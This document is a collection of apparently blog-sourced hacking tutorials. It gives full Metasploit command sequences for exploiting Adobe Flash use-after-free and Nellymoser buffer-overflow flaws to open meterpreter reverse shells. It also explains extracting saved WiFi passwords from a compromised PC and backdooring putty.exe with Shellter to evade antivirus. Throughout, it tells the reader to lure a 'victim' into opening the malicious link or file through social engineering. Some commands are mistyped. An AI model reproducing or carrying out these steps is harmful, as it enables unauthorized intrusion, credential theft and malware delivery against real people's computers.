Hack Windows or Linux PC using Adobe Flash Player ByteArray Use After Free

This module exploits a use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as a Use After Free while handling ByteArray objects. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.

Exploit Targets

Windows 7

Adobe Flash 18.0.0.194

Firefox 38.0.5

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/adobe_flash_hacking_team_uaf

msf exploit (adobe_flash_hacking_team_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_hacking_team_uaf)>set lhost 192.168.0.182 (IP of Local Host)

msf exploit (adobe_flash_hacking_team_uaf)>set srvhost 192.168.0.182

msf exploit (adobe_flash_hacking_team_uaf)>set uripath /

msf exploit (adobe_flash_hacking_team_uaf)>exploit  

Now an URL you should give to your victim http://192.168.0.182:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.182:8080) a session will be opened as shown below

 Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into

Victims command prompt.

Hack Windows or Linux PC using Adobe Flash opaque Background Use After Free

This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as an Use After Free while handling the opaqueBackground property 7 setter of the flash.display.DisplayObject class. This module is an early release tested on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194, windows 8.1, Firefox and Adobe Flash 18.0.0.203, Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and Windows 8.1, Firefox and Adobe Flash 18.0.0.194

Exploit Targets

Windows 7

Adobe Flash 18.0.0.194

Firefox 38.0.5

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/adobe_flash_opaque_background_uaf

msf exploit (adobe_flash_opaque_background_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_opaque_background_uaf)>set lhost 192.168.0.182 (IP of Local Host)

msf exploit (adobe_flash_opaque_background_uaf)>set srvhost 192.168.0.182

msf exploit (adobe_flash_opaque_background_uaf)>set uripath /

msf exploit (adobe_flash_opaque_background_uaf)>exploit

Now an URL you should give to your victim http://192.168.0.182:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.182:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into

Victims command prompt.

How to Gather WIFI Password in Remote Windows PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target PC.

Now to see wireless Network connections in the Victim PC. Use Netsh Command.

Netsh is a command line utility included in Windows operating system which allows local and remote configuration of the network devices such as interface.

netsh wlan show profile

This command will show all profiles on interface wireless network connections accessed by Victim PC.

Now we have got the network interface profiles. To retrieve stored    Security key of specific Network interface profile. Again use Netsh command with specified Profile Name. Such As

Netsh wlan show profile =tiny key =clear

Above command will show the security key as option Key content.

It will also show the Network type, SSID name as well as Authentication present in that Security Key.

Bypass Antivirus and Hack Remote Windows PC with shelter

Hey Folks! Welcome back to learning more of what you love to do. That is, evading security of other computer or network. You know that there are various tools to assist you in this. One of such tools is Shellter.

Shellter is an active shellcode insertion tool. It effectively re-encodes payloads (here shellcode) to bypass anti-virus (AV) software. Shellter has proved to be the first dynamic infector for PE (Portable Executable) file format of Windows 32-bit applications.

To use Shellter, you can either create your own shellcode or create one from a framework such as Metasploit. Shellter embeds a 32-bit Windows application and the shellcode in such as way that it goes undetected by the AV software.

Let’s now discuss the steps to evade an AV software using Shellter in Kali Linux.

Download and Install Shellter

Download Shellter from here. You can download Shellter in Windows and then run it on Kali Linux using Wine. It runs Windows applications on Linux like operating systems. In this way, you can reduce the time required for installation.

You can install Shellter directly on Kali by using the following command:

apt –get install shellter

You can install Wine on Kali with the following command:

apt –get install wine32

Open Shellter

When you open Shellter in Kali in wine mode, it prompts you to choose operation mode.

Choose Operation Mode

Select the mode as ‘a’. It stands for auto. 

Now, you need to choose an executable file and copy it to the Shellter folder. This is required to be done to bind Shellter with an .exe file. In our case, we have copied putty.exe file to the Shellter folder and bound it with shellter.exe file.

When asked for PE Target, type the following command:

/root/Downloads/putty.exe

 

The binding process starts.

Press the Enter key to continue. You may see DisASM.dll file gets successfully created. Enable Stealth Mode. Then, you are prompted to enable stealth mode.

Type ‘y’ for yes.

Select Payload

The screen shows a list of payloads. It asks you whether you want to use a listed payload or custom.

Type ‘L’ to use from listed payload.

Then, it asks you to select payload by index. You can select payload of your choice. In our case, we have selected 1 for Meterpreter_Reverse_TCP

Then you are asked to set LHOST and LPORT. Type the local host IP and the local port on which you want the session. In our case, we have set LHOST 192.168.1.109 [Attacker IP] LPORT as 4444.

When you press the Enter key, the payload information is displayed.

A warning message appears and as soon as the injection is verified, you are asked to press the Enter key to continue. When you press the Enter key.

Run Exploit

In a new terminal type msfconsole to launch metasploit framework and execute following command

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost

set lport

exploit

Send PuTTY.exe File to Victim’s Machine

When the victim’s click the putty.exe file which will be appear as similar as original putty.exe and hence the victim’s will get trapped and we will get meterpreter session.

 

As soon as the victim’s will click on putty.exe file, we will get meterpreter session as shown in the below image.

The meterpreter session opens and there you are ready to peek into the target system.

Hack Remote PC using Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow

This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043

Exploit Targets

Windows 7

Windows 8

Firefox 38.0.5

Adobe Flash 18.0.0.160

Adobe Flash 11.2.202.466

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Now type use exploit/multi/windows/browser/adobe_flash_nellymoser_bof

msf exploit (adobe_flash_nellymoser_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_nellymoser_bof)>set lhost 192.168.0.125 (IP of Local Host)

msf exploit (adobe_flash_nellymoser_bof)>set srvhost 192.168.0.125

msf exploit (adobe_flash_nellymoser_bof)>set uripath /

msf exploit (adobe_flash_nellymoser_bof)>exploit  

Now an URL you should give to your victim http://192.168.0.125:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.125:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into

Victims command prompt.